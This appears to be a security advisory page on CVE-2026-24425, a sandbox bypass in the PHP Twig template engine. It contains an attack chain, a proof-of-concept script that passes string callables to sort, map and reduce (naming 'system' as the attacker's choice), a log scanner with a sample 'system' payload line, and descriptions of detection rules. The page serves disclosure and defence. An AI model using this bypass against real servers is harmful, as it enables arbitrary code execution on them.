high threat

CVE-2026-24425: Twig Sandbox Bypass Vulnerability

Twig versions 2.16.x and 3.9.0 through 3.25.x contain a sandbox bypass (CVE-2026-24425). When the sandbox is enabled per template through a SourcePolicyInterface rather than globally, the runtime check that restricts the callable-taking filters does not see the current template's Source, so an attacker who can render a template can pass an arbitrary PHP callable to sort, filter, map or reduce and execute arbitrary code.

Twig, a template engine for PHP, is affected by a sandbox bypass tracked as CVE-2026-24425 in versions 2.16.x and 3.9.0 through 3.25.x. The flaw is not in SourcePolicyInterface itself but in how the sandbox state is consulted at runtime. A SourcePolicyInterface lets an application enable the sandbox selectively, per template source, instead of for every template rendered by the Environment. The sort, filter, map and reduce filters accept a callable and, in sandbox mode, are meant to accept only an arrow-function Closure, not a string naming a PHP function. The runtime check that enforces this does not pass the current template's Source to the sandbox extension, so when the sandbox is active only through a source policy the check concludes that the sandbox is off. An attacker who can supply a template can therefore hand the name of any PHP function to one of these filters and have it executed, which defeats the sandbox entirely.

Attack Chain

  1. An attacker obtains the ability to render a Twig template of their choosing, typically through a server-side template injection flaw or a feature that accepts user-authored templates.
  2. The application relies on a SourcePolicyInterface to enable the sandbox for those templates instead of enabling it globally for the Environment.
  3. The attacker's template uses the sort, filter, map or reduce filter and passes it a string naming a PHP function (for example 'system') instead of an arrow function.
  4. The filter's runtime check should accept only a Closure while the sandbox is active, but it does not pass the current template's Source to the sandbox extension, so with a source-policy-only sandbox it concludes that the sandbox is off.
  5. The named PHP function is invoked with attacker-controlled arguments, outside the restrictions the sandbox was meant to impose.
  6. The attacker achieves arbitrary code execution on the server.
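The following script is an added example written for this page, not code from the advisory or from the Twig project. It sets up the two sandbox configurations the description and attack chain above contrast (sandbox enabled through a SourcePolicyInterface versus enabled globally) and renders three attacker-style templates that hand a string callable to sort, map and reduce. The Composer autoload path, the template names, the anonymous source policy class and the filter allow-list are assumptions made for the example. Harmless PHP functions stand in for the callable; the sandbox decision is the same whatever function name is supplied.

```php
<?php
// Added example (not code from the advisory or from the Twig project).
// Assumes Twig is installed with Composer. On a version the advisory lists
// as affected, the source-policy configuration executes the callables and
// the global configuration rejects them; on a fixed version both reject them.
require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Error\Error as TwigError;
use Twig\Extension\SandboxExtension;
use Twig\Loader\ArrayLoader;
use Twig\Sandbox\SecurityPolicy;
use Twig\Sandbox\SourcePolicyInterface;
use Twig\Source;

// Attacker-supplied templates (constructed for the example). Each passes a
// string naming a PHP function to an affected filter instead of an arrow
// function. Twig invokes sort's callable as a uasort comparator, map's as
// f($value, $key) and reduce's as f($carry, $item), so two-argument
// functions are used here; an attacker would use something like 'system'.
$untrusted = [
    'untrusted/sort.twig'   => "{{ ['b', 'c', 'a']|sort('strcmp')|join }}",
    'untrusted/map.twig'    => "{{ {2: 'ab'}|map('str_repeat')|join }}",
    'untrusted/reduce.twig' => "{{ [3, 9, 4]|reduce('max') }}",
];

// Allow-list only the filters these templates legitimately need.
$policy = new SecurityPolicy([], ['sort', 'map', 'reduce', 'join']);

// Configuration A: sandbox enabled per template through a SourcePolicyInterface.
// Only templates named under "untrusted/" are sandboxed; the application's
// own templates render unrestricted. This is the vulnerable configuration.
$sourcePolicy = new class implements SourcePolicyInterface {
    public function enableSandbox(Source $source): bool
    {
        return str_starts_with($source->getName(), 'untrusted/');
    }
};
$perSource = new SandboxExtension($policy, false, $sourcePolicy);

// Configuration B: sandbox enabled globally for the whole Environment.
$global = new SandboxExtension($policy, true);

function renderAll(string $label, SandboxExtension $sandbox, array $templates): void
{
    $twig = new Environment(new ArrayLoader($templates));
    $twig->addExtension($sandbox);
    foreach (array_keys($templates) as $name) {
        try {
            $out = $twig->render($name);
            printf("%-14s %-22s executed -> %s\n", $label, $name, $out);
        } catch (TwigError $e) {
            // RuntimeError from the Closure check, or SecurityError from the policy.
            printf("%-14s %-22s blocked  -> %s\n", $label, $name, $e->getMessage());
        }
    }
}

renderAll('source policy', $perSource, $untrusted);
renderAll('global', $global, $untrusted);
```

Run it once on the affected version and again after upgrading; the "source policy" rows are the ones that change. Note that the SecurityPolicy allow-list is not what decides the outcome here: all three filters are permitted in both configurations, and the difference comes entirely from whether the filter's runtime callable check believes the sandbox is active.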

Impact

Successful exploitation lets an attacker who already has template rendering capability escape the sandbox that was meant to contain them and execute arbitrary code on the server. The practical outcome is the same as any unsandboxed server-side template injection: complete system compromise, data theft or denial of service. The number of affected installations is unknown, but any application using Twig in the listed version range that relies on a SourcePolicyInterface to enable the sandbox is potentially vulnerable; applications that enable the sandbox globally are not affected by this particular bypass.

Recommendation

  • Upgrade Twig to version 3.26.0 or later, which fixes CVE-2026-24425.
  • If upgrading is not immediately possible, enable the sandbox globally (the second constructor argument of SandboxExtension) instead of through a SourcePolicyInterface. A global sandbox applies the SecurityPolicy to every template the Environment renders, including the application's own, so confirm that the policy's allow-lists cover what those templates need before switching.
  • Review web server and application logs for template-rendering requests in which sort, filter, map or reduce receives a quoted PHP function name rather than an arrow function (x => ...); arrow functions are the legitimate form and are permitted in the sandbox. Access logs normally record only the request line, so payloads sent in POST bodies are visible only with application or WAF logging.
  • Deploy the Sigma rule "Detect Twig Sandbox Bypass Attempt via PHP Callable" to identify potential exploitation attempts in web server logs.
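The log review recommended above comes down to one distinguishing feature: a callable-taking Twig filter whose argument is a quoted function name instead of an arrow function. The scanner below is an added example written for this page; it is not the platform's Sigma rule, whose body is not reproduced here, and the access-log lines it scans are constructed for the example. The combined-log regex, the double URL-decoding and the payload pattern are the author's own choices, not anything from the advisory.

```php
<?php
// Added example (not the platform's Sigma rule). Scans access-log lines for
// a sort/filter/map/reduce filter that receives a quoted PHP function name.
// After URL-decoding, the pattern matches e.g. |map('system') or
// | sort("strcmp"). An arrow function such as map(v => v) does not match
// because the first argument is not a quoted string.
const TWIG_CALLABLE_ABUSE_RE =
    '/\|\s*(sort|filter|map|reduce)\s*\(\s*[\'"]\s*([A-Za-z_\\\\][A-Za-z0-9_\\\\:]*)\s*[\'"]/';

// Pulls the request target out of a combined-format access log line.
function extractRequestTarget(string $line): ?string
{
    if (preg_match('/"(?:GET|POST|PUT|PATCH|DELETE)\s+(\S+)\s+HTTP\/[\d.]+"/', $line, $m)) {
        return $m[1];
    }
    return null;
}

// Returns ['filter' => ..., 'callable' => ...] for a suspicious line, else null.
function detectTwigCallableAbuse(string $line): ?array
{
    $target = extractRequestTarget($line);
    if ($target === null) {
        return null;
    }
    // Decode twice: payloads are often double-encoded to get past proxies.
    // urldecode() also turns '+' into a space, which rawurldecode() does not.
    $decoded = urldecode(urldecode($target));
    if (!preg_match(TWIG_CALLABLE_ABUSE_RE, $decoded, $m)) {
        return null;
    }
    return ['filter' => $m[1], 'callable' => $m[2]];
}

function scanAccessLog(array $lines): array
{
    $hits = [];
    foreach ($lines as $i => $line) {
        if (($hit = detectTwigCallableAbuse($line)) !== null) {
            $hits[] = ['line' => $i + 1] + $hit;
        }
    }
    return $hits;
}

// Constructed sample log lines (not real traffic).
$sampleLog = [
    // benign arrow function:  {{ items|map(v => v)}}
    '203.0.113.5 - - [10/Feb/2026:10:00:00 +0000] "GET /preview?tpl=%7B%7B%20items%7Cmap(v%20%3D%3E%20v)%7D%7D HTTP/1.1" 200 512',
    // string callable to map: {{ ['id']|map('system')}}
    '203.0.113.7 - - [10/Feb/2026:10:00:01 +0000] "POST /preview?tpl=%7B%7B%20%5B%27id%27%5D%7Cmap(%27system%27)%7D%7D HTTP/1.1" 200 640',
    // double-encoded string callable to sort: {{ x|sort("strcmp") }}
    '203.0.113.9 - - [10/Feb/2026:10:00:02 +0000] "GET /preview?tpl=%257B%257B%2520x%257Csort(%2522strcmp%2522)%2520%257D%257D HTTP/1.1" 200 300',
    // unrelated request
    '203.0.113.5 - - [10/Feb/2026:10:00:03 +0000] "GET /static/app.css HTTP/1.1" 200 9000',
];

foreach (scanAccessLog($sampleLog) as $hit) {
    printf("line %d: %s filter given string callable '%s'\n",
        $hit['line'], $hit['filter'], $hit['callable']);
}
```

The first sample line is the legitimate arrow-function form and produces no hit; the second and third carry string callables, one of them double-encoded. The pattern deliberately ignores the function name, since any PHP function name is an anomaly in a sandboxed template; triage on the name afterwards. Because the scanner only sees the request line, it cannot observe payloads delivered in POST bodies, which is the caveat noted in the recommendations.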

Detection coverage (2 rules)

Detect Twig Sandbox Bypass Attempt via PHP Callable

high

Detects CVE-2026-24425 exploitation — an attempt to bypass the Twig sandbox by using a PHP callable function within Twig template filters.

Type: Sigma | Tactics: execution | Techniques: T1203 | Sources: webserver

Detect Twig SourcePolicyInterface Usage

info

Detects usage of SourcePolicyInterface, which is the sandbox configuration required for CVE-2026-24425 to be exploitable.

Type: Sigma | Tactics: initial_access | Sources: webserver
